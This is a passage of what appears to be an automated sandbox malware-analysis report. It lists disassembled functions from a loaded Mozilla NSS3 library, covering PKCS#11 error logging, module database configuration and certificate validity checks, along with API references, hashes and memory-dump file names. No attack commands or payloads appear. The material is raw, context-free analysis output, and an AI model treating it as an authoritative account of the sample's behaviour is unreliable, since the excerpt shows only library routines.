                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeMallocstrlen
                                                                                                                                                                                                                            • String ID: >
                                                                                                                                                                                                                            • API String ID: 1782319670-325317158
                                                                                                                                                                                                                            • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                            • Instruction ID: 75d0657a23ad901fc932507f8d7679fe296edc1411783eb6a4cd18a37b538425
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DD14762B4164B0BEB34487D8CA13EA7793D782374F684329D572DBBE5F61988838371
                                                                                                                                                                                                                            Function 6CC1AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 16ca8837e2a46c8e3d091ba1c2fd3fc20b0152d0cd5aaead78503ec703d6247a
                                                                                                                                                                                                                            • Instruction ID: c1762660f43ae43054477f68777f4e66066c8a43c816560d8029bd37f3e13693
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16ca8837e2a46c8e3d091ba1c2fd3fc20b0152d0cd5aaead78503ec703d6247a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F1FFB5E092568FDB04CFAED8503A977F0AB8A308F15426DC805D7B40F774AA56DBC4
                                                                                                                                                                                                                            Function 6CC30C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 74e38f23f9b4f6bce7b55cf24bd9080a23b3ca76fc02b9760dc68cf7a8e95dac
                                                                                                                                                                                                                            • Instruction ID: 8291ed59ae8e4be6ad8bce8e1e8ae9dcaf93573edc12bed80df634bf40a32dbd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74e38f23f9b4f6bce7b55cf24bd9080a23b3ca76fc02b9760dc68cf7a8e95dac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9711C175B043158FCB00DF19E88066A7BB2FFC5368F14806DD8198B701EB71E80ACBA1
                                                                                                                                                                                                                            Function 6CC30D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                            • Instruction ID: a60632663fd3cd85c0ab3b01ecac8ffe8581d2adcdaedd9e0cc329d7168f78cb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE06D3B202464A7DB558E09E450AA97399EF81619FA490B9CC5D9BA01E633F8038B81
                                                                                                                                                                                                                            Function 6CB91D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CB91D46), ref: 6CB92345
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print
                                                                                                                                                                                                                            • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                                                                                                                                                                                            • API String ID: 3558298466-1980531169
                                                                                                                                                                                                                            • Opcode ID: b8eb188e2e52c79c380022ace2622502fc586b7fed502555066f2dcaee189f88
                                                                                                                                                                                                                            • Instruction ID: bc0e83354a9f21864c4c2921cad86b2718f619660be524611e301b20e07efc4a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8eb188e2e52c79c380022ace2622502fc586b7fed502555066f2dcaee189f88
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D561F320E8E4C7CFEA1C468C85BE36E3124E743354FA4C17BE5828FE51E695CA874693
                                                                                                                                                                                                                            Function 6CBC5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CBC5E08
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5E3F
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CBC5E5C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5E7E
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5E97
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CBC5EA5
                                                                                                                                                                                                                            • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CBC5EBB
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5ECB
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CBC5EF0
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5F12
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5F35
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CBC5F5B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5F82
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CBC5FA3
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CBC5FB7
                                                                                                                                                                                                                            • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CBC5FC4
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5FDB
                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CBC5FE9
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5FFE
                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CBC600C
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBC6027
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CBC605A
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,00000000), ref: 6CBC606A
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC607C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC609A
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC60B2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC60CE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                            • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                            • API String ID: 1427204090-154007103
                                                                                                                                                                                                                            • Opcode ID: 9c5df72e48430cde89041a30dfc43d52ce44fb84003c410aaf81c421db555ec8
                                                                                                                                                                                                                            • Instruction ID: 8df33004b49084bc1cb397c2a961cfb4adea87c86a724d17451a128da602af7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c5df72e48430cde89041a30dfc43d52ce44fb84003c410aaf81c421db555ec8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB91D5F0B042855BEF119F649C81BAA3BA8DF06288F080060EC55ABB42E775D959D7B7
                                                                                                                                                                                                                            Function 6CB51D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB51DA3
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CB51DB2
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB51DD8
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CB51E4F
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CB51EA4
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CB51ECD
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CB51EEF
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CB51F17
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB51F34
                                                                                                                                                                                                                            • PR_SetLogBuffering.NSS3(00004000), ref: 6CB51F61
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CB51F6E
                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB51F83
                                                                                                                                                                                                                            • PR_SetLogFile.NSS3(00000000), ref: 6CB51FA2
                                                                                                                                                                                                                            • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CB51FB8
                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6CB51FCB
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB51FD2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                            • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                            • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                            • Opcode ID: 2e332012c743b5f349b1a68f7d014f2ca81b10e32db0430d003890d21e47a485
                                                                                                                                                                                                                            • Instruction ID: 783fdbcc86ac05bb60f49dea5e052472af212f7e5c30d356a00c74a85e1c3442
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e332012c743b5f349b1a68f7d014f2ca81b10e32db0430d003890d21e47a485
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43519FB1E002899BDF00DFE5DC44A9E77B8EF01309F480528E916DBA40F775D568CBA2
                                                                                                                                                                                                                            Function 6CBC4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C50
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C5B
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C76
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4CAE
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CC9
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CF4
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4D0B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D5E
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D68
                                                                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBC4D85
                                                                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBC4DA2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC4DB9
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC4DCF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                            • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                            • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                            • Opcode ID: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
                                                                                                                                                                                                                            • Instruction ID: 14e02d6961b7dbcf3e21ec5defa86c7d1e334e873e7689a67046c2ada566e89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 004149B2A001916BDB116F589C45ABF3675EB82358F188124EC1A5BB01E735DE64CBE3
                                                                                                                                                                                                                            Function 6CB6DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB6DDDE
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CB6DDF5
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CB6DE34
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB6DE93
                                                                                                                                                                                                                            • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CB6DE9D
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB6DEB4
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB6DEC3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB6DED8
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s%s,?,?), ref: 6CB6DEF0
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,(NULL) (Validity Unknown)), ref: 6CB6DF04
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB6DF13
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB6DF22
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB6DF33
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB6DF3C
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB6DF4B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB6DF74
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB6DF8E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
